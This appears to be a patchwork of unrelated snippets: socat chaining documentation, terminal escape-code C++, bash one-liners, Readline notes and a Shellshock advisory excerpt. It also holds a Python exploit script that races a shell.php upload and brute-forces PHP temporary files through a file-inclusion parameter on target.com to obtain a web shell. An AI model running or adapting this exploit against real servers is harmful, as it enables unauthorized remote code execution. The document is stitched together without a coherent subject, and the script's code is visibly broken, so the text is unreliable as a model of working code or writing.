socat address chains concatenate internal modules that communicate bidirectionally. For example, a chain that establishes encrypted connection to a socks server might look something like this (parameters and options dropped):

"SOCKS:... | OPENSSL-CLIENT | TCP:..."

If you have a program that implements a new encryption protocol the chain could be changed to:

"SOCKS:... | EXEC:myencrypt.sh | TCP:..."

The complete example:

socat - "SOCKS:www.domain.com:80 | EXEC:myencrypt.sh | TCP:encrypt.secure.org:444"

The myencrypt.sh script would be a wrapper around some myencrypt program. It must adhere a few rules: It reads and writes cleartext data on its left side (FDs 0 and 1), and it reads and writes encrypted data on its right side (FDs 3 and 4). Thus, cleartext data would come from the left on FD 0, be encrypted, and sent to the right side through FD 4. Encrypted data would come from the the right on FD 3, be unencrypted, and sent to the left side through FD 1. It does not matter if the encryption protocol would required negotiations or multiple packets on the right side.

/ scroll down a bit to avoid visual glitch when the screen
// area shrinks by one row
std::cout << "\n";

// save cursor
std::cout << "\0337";

// set scroll region (this will place the cursor in the top left)
std::cout << "\033[0;" << std::to_string(nr_rows - 1) << "r";

// restore cursor but ensure its inside the scrolling area
std::cout << "\0338";
static const char *move_cursor_up = "\033[1A";
std::cout << move_cursor_up;

printf >&2 '%s: reading from stdin...' "$(basename "$0")"
stdin=$(cat <&0)
printf >&2 '\r\033[0K'

echo "$stdin"

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)

print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text: # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

The Principle of Least Privilege says that software shouldn't be executed with more authority than it needs to get its job done. Unfortunately, following this principle is hard; most operating systems are configured so that the scripts and programs you run can do anything you can.

Although the Readline library comes with a set of default keybindings, it is possible to modify these by putting commands into a .inputrc file, typically in the home directory. The name of this file is taken from the value of the shell variable INPUTRC. If that variable is unset, the default is ~/.inputrc If that file does not exist or cannot be read, the ultimate default is /etc/inputrc

Stephane Chazelas discovered a vulnerability in bash, related to how
environment variables are processed: trailing code in function
definitions was executed, independent of the variable name.

In many common configurations, this vulnerability is exploitable over
the network.

SOme stuff on bash programming

echo $(printf %08X 256 | grep -o .. | tac | tr -d '\n')

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

for i in pidof python; do cat /proc/$i/cmdline | tr "\0" " " | sed "s/$/ $i\n/"; done

Check if stdout is a tty , from different languages.